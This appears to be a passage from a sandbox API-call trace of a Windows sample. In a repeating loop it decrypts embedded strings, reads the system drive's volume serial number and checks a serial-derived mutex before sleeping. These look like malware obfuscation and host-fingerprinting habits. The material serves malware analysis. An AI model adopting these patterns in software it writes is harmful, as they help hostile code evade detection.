[0191.479] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0191.479] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0191.479] CryptDestroyKey (hKey=0xa32be8) returned 1 [0191.479] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0191.479] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xac [0191.479] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x0) returned 0x102 [0191.479] CloseHandle (hObject=0xac) returned 1 [0191.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0191.479] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0191.479] Sleep (dwMilliseconds=0x3e8) [0192.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0192.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32a28) returned 1 [0192.672] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0192.672] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0192.672] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0192.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0192.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0192.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32a28) returned 1 [0192.672] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0192.672] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0192.672] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.672] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0192.672] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0192.672] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0192.672] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0192.672] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0192.672] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0192.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0192.672] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32a28) returned 1 [0192.672] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0192.672] CryptDecrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0192.672] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.672] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0192.672] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xac [0192.672] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x0) returned 0x102 [0192.672] CloseHandle (hObject=0xac) returned 1 [0192.672] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0192.672] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0192.673] Sleep (dwMilliseconds=0x3e8) [0193.754] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0193.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32be8) returned 1 [0193.754] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0193.754] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0193.754] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.754] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0193.754] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0193.754] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0193.754] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32be8) returned 1 [0193.754] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0193.754] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0193.754] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.754] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0193.754] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0193.754] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0193.754] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0193.754] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0193.755] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0193.755] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0193.755] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32be8) returned 1 [0193.755] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0193.755] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0193.755] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.755] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0193.755] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x164 [0193.755] WaitForSingleObject (hHandle=0x164, dwMilliseconds=0x0) returned 0x102 [0193.755] CloseHandle (hObject=0x164) returned 1 [0193.755] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0193.755] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0193.755] Sleep (dwMilliseconds=0x3e8) [0194.767] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0194.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32de8) returned 1 [0194.767] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0194.767] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0194.767] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.767] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0194.767] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0194.767] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0194.767] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32de8) returned 1 [0194.767] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0194.767] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0194.768] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.768] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0194.768] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0194.768] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0194.768] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0194.768] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0194.768] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0194.768] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32de8) returned 1 [0194.768] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0194.768] CryptDecrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0194.768] CryptDestroyKey (hKey=0xa32de8) returned 1 [0194.768] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0194.768] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xb8 [0194.768] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0194.768] CloseHandle (hObject=0xb8) returned 1 [0194.768] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0194.768] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0194.768] Sleep (dwMilliseconds=0x3e8) [0195.962] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0195.962] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c28) returned 1 [0195.962] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0195.962] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0195.962] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.962] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0195.962] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0195.962] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0195.962] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c28) returned 1 [0195.962] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0195.962] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0195.962] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.962] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0195.962] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0195.962] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0195.962] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0195.962] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0195.963] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0195.963] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0195.963] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c28) returned 1 [0195.963] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0195.963] CryptDecrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0195.963] CryptDestroyKey (hKey=0xa32c28) returned 1 [0195.963] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0195.963] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0xb4 [0195.963] WaitForSingleObject (hHandle=0xb4, dwMilliseconds=0x0) returned 0x102 [0195.963] CloseHandle (hObject=0xb4) returned 1 [0195.963] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0195.963] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0195.963] Sleep (dwMilliseconds=0x3e8) [0197.071] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0197.071] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32be8) returned 1 [0197.071] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0197.071] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0197.071] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.071] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0197.071] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0197.071] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x33c0008 [0197.071] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32be8) returned 1 [0197.071] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0197.071] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x33c0008, pdwDataLen=0x221f7e4 | out: pbData=0x33c0008, pdwDataLen=0x221f7e4) returned 1 [0197.071] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.071] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x33c0008 | out: hHeap=0x20f0000) returned 1 [0197.071] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0197.071] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0197.071] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0197.071] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0197.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0197.072] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32be8) returned 1 [0197.072] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0197.072] CryptDecrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0197.072] CryptDestroyKey (hKey=0xa32be8) returned 1 [0197.072] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0197.072] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x14c [0197.072] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0197.072] CloseHandle (hObject=0x14c) returned 1 [0197.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0197.072] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0197.072] Sleep (dwMilliseconds=0x3e8) [0198.292] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0198.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32aa8) returned 1 [0198.292] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0198.292] CryptDecrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x221f80c | out: pbData=0x20fd988, pdwDataLen=0x221f80c) returned 1 [0198.292] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0198.292] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0198.292] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0198.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32aa8) returned 1 [0198.292] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0198.292] CryptDecrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0198.292] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.292] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0198.292] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd9b0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0198.292] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0198.292] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0198.292] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0198.292] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0198.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32aa8) returned 1 [0198.292] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0198.292] CryptDecrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0198.292] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0198.292] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1600 [0198.292] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x174 [0198.292] WaitForSingleObject (hHandle=0x174, dwMilliseconds=0x0) returned 0x102 [0198.293] CloseHandle (hObject=0x174) returned 1 [0198.293] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0198.293] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0198.293] Sleep (dwMilliseconds=0x3e8) [0199.353] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0199.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32aa8) returned 1 [0199.353] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0199.353] CryptDecrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x221f80c | out: pbData=0x20fd9b0, pdwDataLen=0x221f80c) returned 1 [0199.353] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.353] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd988 [0199.353] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20fd9d8 [0199.353] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227820 [0199.353] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32aa8) returned 1 [0199.354] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0199.354] CryptDecrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f7e4 | out: pbData=0x2227820, pdwDataLen=0x221f7e4) returned 1 [0199.354] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0199.354] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20fd988, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0199.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9d8 | out: hHeap=0x20f0000) returned 1 [0199.354] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0199.354] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, 